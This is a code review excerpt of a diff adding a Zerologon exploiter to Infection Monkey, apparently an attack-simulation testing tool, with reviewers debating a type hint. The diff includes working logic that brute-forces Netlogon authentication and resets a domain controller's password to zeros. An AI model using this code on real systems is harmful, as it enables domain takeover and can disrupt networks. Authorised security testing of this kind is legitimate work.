monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,433 @@
+            except Exception as e:
+                LOG.info(f"Exception occurred while connecting to DC: {str(e)}")
+                return False
+
+            # Start exploiting attempts.
+            LOG.debug("Attempting exploit.")
+            _exploited = self._send_exploit_rpc_login_requests(rpc_con)
+
+            rpc_con.disconnect()
+
+        else:
+            LOG.info("Exploit not attempted. "
+                     "Target is most likely patched, or an error was encountered by the Zerologon fingerprinter.")
+            return False
+
+        # Restore DC's original password.
+        if _exploited:
+            if self.restore_password():
+                LOG.info("System exploited and password restored successfully.")
+            else:
+                LOG.info("System exploited but couldn't restore password!")
+        else:
+            LOG.info("System was not exploited.")
+
+        return _exploited
+
+    def is_exploitable(self) -> bool:
+        if self.zerologon_finger._SCANNED_SERVICE in self.host.services:
+            return self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']
+        else:
+            is_vulnerable = self.zerologon_finger.attempt_authentication(dc_handle=self.dc_handle,
+                                                                         dc_ip=self.dc_ip,
+                                                                         dc_name=self.dc_name)
+            return is_vulnerable
+
+    def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
+        # Max attempts = 2000. Expected average number of attempts needed: 256.
+        for _ in range(0, self.MAX_ATTEMPTS):
+            exploit_attempt_result = self.try_exploit_attempt(rpc_con)
+
+            is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result)
+            if is_exploited:
+                return is_exploited
+
+        return False
+
+    def try_exploit_attempt(self, rpc_con):
+        try:
+            exploit_attempt_result = self.attempt_exploit(rpc_con)
+            return exploit_attempt_result
+        except nrpc.DCERPCSessionError as e:
+            # Failure should be due to a STATUS_ACCESS_DENIED error.
+            # Otherwise, the attack is probably not working.
+            if e.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
+                LOG.info(f"Unexpected error code from DC: {e.get_error_code()}")
+        except BaseException as e:
+            LOG.info(f"Unexpected error: {e}")
+
+    def attempt_exploit(self, rpc_con: object) -> object:
+        request = nrpc.NetrServerPasswordSet2()
+        ZerologonExploiter._set_up_request(request, self.dc_name)
+        request['PrimaryName'] = self.dc_handle + '\x00'
+        request['ClearNewPassword'] = b'\x00' * 516
+
+        return rpc_con.request(request)
+
+    @staticmethod
+    def _set_up_request(request: object, dc_name: str) -> None:
```

Comment:
So `request` is an object, but then you access properties like that: `request['AccountName']`. Are you sure this type hint is correct?

Reply:
Yes, it's an `impacket.dcerpc.v5.nrpc.NetrServerPasswordSet2` object instantiated in `attempt_exploit()`.

```python3
    def attempt_exploit(self, rpc_con: object) -> object:
        request = nrpc.NetrServerPasswordSet2()
        ZerologonExploiter._set_up_request(request, self.dc_name)
        ...
```

Reply:
Object type objects in python are not subscriptable, which means you can't access an `object` property like that: `_object['prop']`. If request is of type `NetrServerPasswordSet2` then your type hint should be `def _set_up_request(request: NetrServerPasswordSet2, dc_name: str)`